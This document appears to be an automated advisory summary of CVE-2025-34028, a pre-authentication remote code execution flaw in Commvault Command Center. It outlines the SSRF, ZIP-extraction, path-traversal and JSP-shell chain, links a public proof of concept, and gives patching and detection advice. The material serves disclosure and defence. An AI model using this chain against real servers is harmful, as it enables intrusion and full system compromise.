Full Report
Following the CVE-2025-30406 disclosure, an RCE flaw in the widely used Gladinet CentreStack and Triofox platforms, another highly critical vulnerability that could also allow remote execution of arbitrary code without authentication, is coming to the scene. The flaw, tracked as CVE-2025-34028, has been recently uncovered in the Command Center installation, which could lead to a […] The post CVE-2025-34028 Detection: A Maximum-Severity Vulnerability in the Commvault Command Center Enables RCE appeared first on SOC Prime.
Analysis Summary
# Vulnerability: Pre-Authenticated Remote Code Execution in Commvault Command Center
## CVE Details
- CVE ID: CVE-2025-34028
- CVSS Score: Maximum Severity (Specific score not provided, but noted as Maximum Severity)
- CWE: Not explicitly stated (Likely related to SSRF/Path Traversal leading to RCE)
## Affected Systems
- Products: Commvault Command Center
- Versions: Specific vulnerable versions are not listed in the provided context.
- Configurations: Vulnerability relies on interaction with a specific endpoint.
## Vulnerability Description
The vulnerability is a chain attack leading to Remote Code Execution (RCE) originating from a pre-authenticated Server-Side Request Forgery (SSRF) weakness in a specific endpoint. The attack involves:
1. Sending a request to fetch a malicious ZIP file from an external server via the vulnerable endpoint, leveraging a lack of host validation (SSRF).
2. The ZIP file is unpacked into a temporary directory.
3. Path traversal in the `servicePack` parameter is used to move the contents (a malicious `.jsp` shell file) to a web-accessible directory.
4. Execution of the extracted `.jsp` file achieves Remote Code Execution, potentially leading to a full system compromise.
## Exploitation
- Status: PoC available. WatchTowr Labs researchers have published a Detection Artefact Generator with a PoC.
- Complexity: Implied Low/Medium as it is pre-authenticated and a clear chain exists.
- Attack Vector: Network (Pre-authenticated).
## Impact
- Confidentiality: High (Potential for full system compromise)
- Integrity: High (Potential for full system compromise)
- Availability: High (Potential for full system compromise)
## Remediation
### Patches
- Vendor urges **immediate upgrades**. Specific patch versions are not detailed in this summary context.
### Workarounds
- No specific workarounds were detailed in the provided text, other than the urgent need for patching/upgrading.
## Detection
- **Indicators of compromise (IOCs):** Look for unexpected archive uploads (ZIP files) interacting with the vulnerable endpoint, extraction of JSP files to web-accessible directories, and subsequent execution attempts. Historical system user information revelation in response logs could be an indicator if the PoC was executed.
- **Detection methods and tools:** Utilize cybersecurity platforms (like SOC Prime Platform mentioned) to deploy detection rules specifically targeting the exploitation attempt chain (SSRF traffic, file manipulation, JSP execution).
## References
- Vendor advisory (Implied urgency for upgrade).
- WatchTowr Labs GitHub repository containing the PoC: `github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028`